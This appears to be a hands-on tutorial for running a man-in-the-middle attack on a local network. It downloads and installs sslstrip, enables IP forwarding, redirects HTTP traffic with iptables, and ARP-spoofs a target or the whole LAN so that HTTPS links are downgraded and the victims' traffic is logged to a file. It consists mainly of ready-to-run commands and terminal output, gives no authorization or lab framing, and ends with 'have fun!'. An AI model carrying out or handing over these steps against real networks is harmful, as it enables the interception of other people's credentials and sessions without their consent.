This tutorial will show you how to setup sslstrip. It will transparently hijack HTTP traffic on a network, watch for HTTPS links and redirects, then map those links into either look-alike HTTP links or similar HTTPS links. It also supports modes for supplying a favicon which looks like a lock icon, selective logging, and session denial.
Aren't you excited?!
Open a terminal window
Download sslstrip from:
http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.9.tar.gz
With this command:
wget http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.9.tar.gz
#BEGIN TERMINAL OUTPUT
root@bt:~# wget http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.9.tar.gz
--2011-12-05 01:35:11-- http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.9.tar.gz
Resolving www.thoughtcrime.org... 72.14.190.145
Connecting to www.thoughtcrime.org|72.14.190.145|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 22198 (22K) [application/x-gzip]
Saving to: `sslstrip-0.9.tar.gz'
100%[====================================================================================>] 22,198 --.-K/s in 0.07s
2011-12-05 01:35:11 (306 KB/s) - `sslstrip-0.9.tar.gz' saved [22198/22198]
#END TERMINAL OUTPUT
Extract the package "sslstrip-0.9.tar.gz" with the following command:
tar -zxvf sslstrip-0.9.tar.gz
#BEGIN TERMINAL OUTPUT
root@bt:~# tar -zxvf sslstrip-0.9.tar.gz
sslstrip-0.9/
sslstrip-0.9/README
sslstrip-0.9/COPYING
sslstrip-0.9/setup.py
sslstrip-0.9/sslstrip/
sslstrip-0.9/sslstrip/StrippingProxy.py
sslstrip-0.9/sslstrip/SSLServerConnection.py
sslstrip-0.9/sslstrip/ServerConnectionFactory.py
sslstrip-0.9/sslstrip/ClientRequest.py
sslstrip-0.9/sslstrip/ServerConnection.py
sslstrip-0.9/sslstrip/CookieCleaner.py
sslstrip-0.9/sslstrip/__init__.py
sslstrip-0.9/sslstrip/DnsCache.py
sslstrip-0.9/sslstrip/URLMonitor.py
sslstrip-0.9/lock.ico
sslstrip-0.9/sslstrip.py
#END TERMINAL OUTPUT
You also need to make sure you have python 2.5 or greater and the python "twisted web" module installed.
Install them like this:
apt-get install python python-twisted-web
In my case they were already installed:
#BEGIN TERMINAL OUTPUT
root@bt:~# apt-get install python python-twisted-web
Reading package lists... Done
Building dependency tree
Reading state information... Done
python is already the newest version.
python-twisted-web is already the newest version.
0 upgraded, 0 newly installed, 0 to remove and 38 not upgraded.
#END TERMINAL OUTPUT
Now change to the "sslstrip-0.9" directory:
cd sslstrip-0.9
#BEGIN TERMINAL OUTPUT
root@bt:~# cd sslstrip-0.9
root@bt:~/sslstrip-0.9# ls
COPYING lock.ico README setup.py sslstrip sslstrip.py
#END TERMINAL OUTPUT
Run the command:
python ./setup.py install
#BEGIN TERMINAL OUTPUT
root@bt:~/sslstrip-0.9# python ./setup.py install
running install
running build
running build_py
creating build
creating build/lib.linux-x86_64-2.6
creating build/lib.linux-x86_64-2.6/sslstrip
copying sslstrip/CookieCleaner.py -> build/lib.linux-x86_64-2.6/sslstrip
copying sslstrip/ServerConnectionFactory.py -> build/lib.linux-x86_64-2.6/sslstrip
copying sslstrip/ServerConnection.py -> build/lib.linux-x86_64-2.6/sslstrip
copying sslstrip/StrippingProxy.py -> build/lib.linux-x86_64-2.6/sslstrip
copying sslstrip/ClientRequest.py -> build/lib.linux-x86_64-2.6/sslstrip
copying sslstrip/__init__.py -> build/lib.linux-x86_64-2.6/sslstrip
copying sslstrip/DnsCache.py -> build/lib.linux-x86_64-2.6/sslstrip
copying sslstrip/SSLServerConnection.py -> build/lib.linux-x86_64-2.6/sslstrip
copying sslstrip/URLMonitor.py -> build/lib.linux-x86_64-2.6/sslstrip
running build_scripts
creating build/scripts-2.6
copying and adjusting sslstrip/sslstrip -> build/scripts-2.6
changing mode of build/scripts-2.6/sslstrip from 644 to 755
running install_lib
creating /usr/local/lib/python2.6/dist-packages/sslstrip
copying build/lib.linux-x86_64-2.6/sslstrip/CookieCleaner.py -> /usr/local/lib/python2.6/dist-packages/sslstrip
copying build/lib.linux-x86_64-2.6/sslstrip/ServerConnectionFactory.py -> /usr/local/lib/python2.6/dist-packages/sslstrip
copying build/lib.linux-x86_64-2.6/sslstrip/ServerConnection.py -> /usr/local/lib/python2.6/dist-packages/sslstrip
copying build/lib.linux-x86_64-2.6/sslstrip/StrippingProxy.py -> /usr/local/lib/python2.6/dist-packages/sslstrip
copying build/lib.linux-x86_64-2.6/sslstrip/ClientRequest.py -> /usr/local/lib/python2.6/dist-packages/sslstrip
copying build/lib.linux-x86_64-2.6/sslstrip/__init__.py -> /usr/local/lib/python2.6/dist-packages/sslstrip
copying build/lib.linux-x86_64-2.6/sslstrip/DnsCache.py -> /usr/local/lib/python2.6/dist-packages/sslstrip
copying build/lib.linux-x86_64-2.6/sslstrip/SSLServerConnection.py -> /usr/local/lib/python2.6/dist-packages/sslstrip
copying build/lib.linux-x86_64-2.6/sslstrip/URLMonitor.py -> /usr/local/lib/python2.6/dist-packages/sslstrip
byte-compiling /usr/local/lib/python2.6/dist-packages/sslstrip/CookieCleaner.py to CookieCleaner.pyc
byte-compiling /usr/local/lib/python2.6/dist-packages/sslstrip/ServerConnectionFactory.py to ServerConnectionFactory.pyc
byte-compiling /usr/local/lib/python2.6/dist-packages/sslstrip/ServerConnection.py to ServerConnection.pyc
byte-compiling /usr/local/lib/python2.6/dist-packages/sslstrip/StrippingProxy.py to StrippingProxy.pyc
byte-compiling /usr/local/lib/python2.6/dist-packages/sslstrip/ClientRequest.py to ClientRequest.pyc
byte-compiling /usr/local/lib/python2.6/dist-packages/sslstrip/__init__.py to __init__.pyc
byte-compiling /usr/local/lib/python2.6/dist-packages/sslstrip/DnsCache.py to DnsCache.pyc
byte-compiling /usr/local/lib/python2.6/dist-packages/sslstrip/SSLServerConnection.py to SSLServerConnection.pyc
byte-compiling /usr/local/lib/python2.6/dist-packages/sslstrip/URLMonitor.py to URLMonitor.pyc
running install_scripts
copying build/scripts-2.6/sslstrip -> /usr/local/bin
changing mode of /usr/local/bin/sslstrip to 755
running install_data
creating /usr/local/share/sslstrip
copying README -> /usr/local/share/sslstrip
copying COPYING -> /usr/local/share/sslstrip
copying lock.ico -> /usr/local/share/sslstrip
running install_egg_info
Writing /usr/local/lib/python2.6/dist-packages/sslstrip-0.9.egg-info
Cleaning up...
#END TERMINAL OUTPUT
Now we need to turn on IP forwarding, run this command:
echo "1" > /proc/sys/net/ipv4/ip_forward
Ok, iptables has got to be setup to redirect HTTP traffic to sslstrip:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <listenPort>
Change the <listenPort> above to an ephemeral port. Something like 30000 should do.
So it should look like this:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 30000
Now we are going to execute sslstrip, run this command:
sslstrip -a -l 30000 -w secret.log
The listening port will be whatever you chose for iptables to redirect HTTP traffic too.
#BEGIN TERMINAL OUTPUT
root@bt:~/sslstrip-0.9# sslstrip -a -l 30000 -w secret.log
sslstrip 0.9 by Moxie Marlinspike running...
#END TERMINAL OUTPUT
Notice above in the terminal output. Don't kill the terminal session. sslstrip is running!
Open a new terminal window.
Now we need to setup arpspoof so the network will think you are the gateway or router. This way all traffic is sent to your machine first, then forwarded to the proper gateway on your network.
arpspoof -i <interface> -t <targetIP> <gatewayIP>
If you don't know your interface setting, just run a quick "ifconfig" command and it will list it. The <gatewayIP> is the networks real gateway/router, this is the traffic we want to hijack.
If you want arpspoof to intercept traffic across the whole LAN run:
arpspoof -i <interface> <gatewayIP>
So, I would run the command like this:
arpspoof -i eth0 -t 10.10.1.20 10.10.1.254
#BEGIN TERMINAL OUTPUT
root@bt:~# arpspoof -i eth0 10.10.1.254
0:c:29:39:6c:79 ff:ff:ff:ff:ff:ff 0806 42: arp reply 10.10.1.254 is-at 0:c:29:39:6c:79
0:c:29:39:6c:79 ff:ff:ff:ff:ff:ff 0806 42: arp reply 10.10.1.254 is-at 0:c:29:39:6c:79
0:c:29:39:6c:79 ff:ff:ff:ff:ff:ff 0806 42: arp reply 10.10.1.254 is-at 0:c:29:39:6c:79
0:c:29:39:6c:79 ff:ff:ff:ff:ff:ff 0806 42: arp reply 10.10.1.254 is-at 0:c:29:39:6c:79
0:c:29:39:6c:79 ff:ff:ff:ff:ff:ff 0806 42: arp reply 10.10.1.254 is-at 0:c:29:39:6c:79
0:c:29:39:6c:79 ff:ff:ff:ff:ff:ff 0806 42: arp reply 10.10.1.254 is-at 0:c:29:39:6c:79
0:c:29:39:6c:79 ff:ff:ff:ff:ff:ff 0806 42: arp reply 10.10.1.254 is-at 0:c:29:39:6c:79
#END TERMINAL OUTPUT
Notice above in the terminal output, you will constantly receive arp replies, just let it run. Don't kill the terminal session.
If you need additional help just run:
sslstrip --help
#BEGIN TERMINAL OUTPUT
root@bt:~/sslstrip-0.9# sslstrip --help
sslstrip 0.9 by Moxie Marlinspike
Usage: sslstrip <options>
Options:
-w <filename>, --write=<filename> Specify file to log to (optional).
-p , --post Log only SSL POSTs. (default)
-s , --ssl Log all SSL traffic to and from server.
-a , --all Log all SSL and HTTP traffic to and from server.
-l <port>, --listen=<port> Port to listen on (default 10000).
-f , --favicon Substitute a lock favicon on secure requests.
-k , --killsessions Kill sessions in progress.
-h Print this help message.
#END TERMINAL OUTPUT
That's it...have fun!